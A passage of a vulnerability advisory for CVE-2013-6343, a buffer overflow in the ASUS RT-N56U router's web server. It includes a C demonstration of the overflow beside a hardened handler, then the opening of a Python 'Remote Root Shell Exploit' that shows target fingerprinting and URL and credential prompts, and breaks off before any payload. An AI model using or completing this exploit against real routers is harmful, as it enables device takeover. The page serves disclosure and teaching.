flag' Parameter Buffer Overflow Vulnerability

Release date: 2014-01-21
Update date: 2014-01-23

Affected systems:
Asus RT-N56U 3.0.0.4.374_979
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 65046
CVE(CAN) ID: CVE-2013-6343

The ASUS RT-N56U is a wireless broadband router.

In ASUS RT-N56U firmware 3.0.0.4.374_979 and earlier, installation of a supplemental application is handled by the router's web server (httpd). The installation handler is vulnerable to multiple buffer overflows, reached through over-long values of the apps_name and apps_flag parameters of APP_Installation.asp, which allow an attacker to execute arbitrary code in the context of the affected device.
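The bug class described above, as an added example that is not ASUS code: the real web.c handler is not reproduced here. The block models a request parameter (apps_name) copied into a fixed-size local buffer with no length check, beside a hardened handler that rejects values which do not fit. The 32-byte buffer size, the simulated stack frame with a saved return address directly after the buffer, and the query string are all assumptions made for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the vendor's web.c. Sizes and layout are assumptions:
 * the handler keeps the parameter in a 32-byte local buffer, and the slot
 * right after it holds the saved return address an overflow can reach. */
#define APPS_NAME_MAX 32
#define FRAME_LEN     (APPS_NAME_MAX + 4)   /* buffer + 4-byte saved RA */
#define SAVED_RA_OFF  APPS_NAME_MAX

/* Constructed request: 32 'A' bytes fill apps_name, "BBBB" lands on the
 * saved return address slot. */
const char DEMO_QUERY[] =
    "apps_name=" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "BBBB"
    "&apps_flag=install";

/* Reset the simulated frame: zeroed buffer, recognisable saved RA. */
void init_frame(unsigned char frame[FRAME_LEN])
{
    uint32_t ra = 0xDEADBEEFu;
    memset(frame, 0, FRAME_LEN);
    memcpy(frame + SAVED_RA_OFF, &ra, sizeof ra);
}

uint32_t saved_ra(const unsigned char frame[FRAME_LEN])
{
    uint32_t ra;
    memcpy(&ra, frame + SAVED_RA_OFF, sizeof ra);
    return ra;
}

/* Locate "name=value" in a query string; returns the value and its length
 * (no percent-decoding, which the demo does not need). */
static const char *get_param(const char *query, const char *name, size_t *len)
{
    size_t nlen = strlen(name);
    const char *p = query;
    while (p && *p) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            const char *end = strchr(v, '&');
            *len = end ? (size_t)(end - v) : strlen(v);
            return v;
        }
        p = strchr(p, '&');
        if (p)
            p++;
    }
    return NULL;
}

/* Vulnerable shape: the value is copied with no check against
 * APPS_NAME_MAX. The only clamp is the end of the simulated frame, so the
 * demo itself stays in bounds; the real bug has no clamp at all. */
int vulnerable_handler(unsigned char frame[FRAME_LEN], const char *query)
{
    size_t vlen;
    const char *v = get_param(query, "apps_name", &vlen);
    if (!v)
        return -1;
    if (vlen > FRAME_LEN)
        vlen = FRAME_LEN;                 /* demo-only clamp */
    memcpy(frame, v, vlen);               /* overruns the 32-byte buffer */
    if (vlen < FRAME_LEN)
        frame[vlen] = '\0';
    return 0;
}

/* Hardened shape: refuse anything that does not fit with its terminator,
 * before anything is written. */
int hardened_handler(unsigned char frame[FRAME_LEN], const char *query)
{
    size_t vlen;
    const char *v = get_param(query, "apps_name", &vlen);
    if (!v)
        return -1;
    if (vlen >= APPS_NAME_MAX)
        return 400;                       /* reject, never touch the buffer */
    memcpy(frame, v, vlen);
    frame[vlen] = '\0';
    return 0;
}

int main(void)
{
    unsigned char frame[FRAME_LEN];
    int rc;

    init_frame(frame);
    rc = vulnerable_handler(frame, DEMO_QUERY);
    printf("vulnerable: rc=%d, saved RA = 0x%08x\n", rc, (unsigned)saved_ra(frame));

    init_frame(frame);
    rc = hardened_handler(frame, DEMO_QUERY);
    printf("hardened:   rc=%d, saved RA = 0x%08x\n", rc, (unsigned)saved_ra(frame));
    return 0;
}
```

The vulnerable path leaves 0x42424242 in the saved-RA slot, which is exactly the primitive a remote-root exploit builds on; the hardened path returns an error before writing a byte. On a MIPS-based router the same fix applies to any copy into a fixed buffer, whether it is done with strcpy, sprintf or a hand-rolled loop.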

<*Source: Jacob Holcomb
  *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Users assume all risk!

#!/usr/bin/env python

from time import sleep
from sys import exit
import urllib2, signal, struct, base64, socket, ssl

# [*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
# [*] Discovered and Reported: October 2013
# [*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
# [*] Contact: Twitter - @rootHak42
# [*] Software Vendor:
# [*] Exploit/Advisory: ,
# [*] Software: httpd (Listens on TCP/80 and TCP/443)
# [*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
# [*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343
#
# [*] Overview:
#      Multiple ASUS routers including the RT-N56U and RT-AC66U have the ability to install
#      supplemental applications. This install process is handled by the routers web server,
#      and is susceptible to multiple Buffer Overflow attacks.
#
#      Vulnerable Web Page: APP_Installation.asp
#      Vulnerable HTML Parameters: apps_name, apps_flag
#      Vulnerable Source File: web.c of httpd code
#      *Firmware versions prior to the tested version were vulnerable to this attack.
#


def fingerPrint(host, port, netSock):

    # Banner strings that identify a supported target.
    fprint = ["RT-N56U"]
    found = None
    print " [*] Preparing to fingerprint the server."
    try:
        print " [*] Connecting to %s on port %d." % (host, port)
        netSock.connect((host, port))
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

    try:
        print " [*] Sending fingerprint request."
        netSock.send("HEAD / HTTP/1.1\r\n\r\n")
        netData = netSock.recv(1024)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

    try:
        print " [*] Closing network socket.\n"
        netSock.close()
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)

    # Match the model name in the HTTP response against the signature list.
    for item in fprint:
        if item in netData:
            print " [!!!] Target system found in signature list - Result: %s [!!!]\n" % item
            sleep(1)
            found = item
    if found is None:
        print " [!!!] Server banner doesn't match available targets. [!!!]\n"
        sleep(1)
        exit(0)
    else:
        return found


def targURL():

    while True:

        URL = raw_input("\n[*] Please enter the URL of the router. Ex. \n>")
        if len(URL) != 0 and (URL[0:7] == "http://" or URL[0:8] == "https://"):
            return URL.lower()
        else:
            print "\n\n [!!!] Target URL can't be null and must contain http:// or https:// [!!!]\n"
            sleep(1)


def creds():

    while True:

        User = raw_input("\n[*] Please enter the username for the routers HTTP Basic Authentication:\n>")
        Pass = raw_input("\n[*] Please enter the password for the supplied username:\n>")
        if len(User) != 0:
            return User, Pass
        else:
            print "\n [!!!] Username can't be null [!!!]\n"
            sleep(1)


def basicAuth():

    auth = None

    while auth != "yes" and auth != "no":
        auth = raw_input("\n[*] Would you like to use HTTP Basic Authentication? \"yes\" or \"no\"\n>")
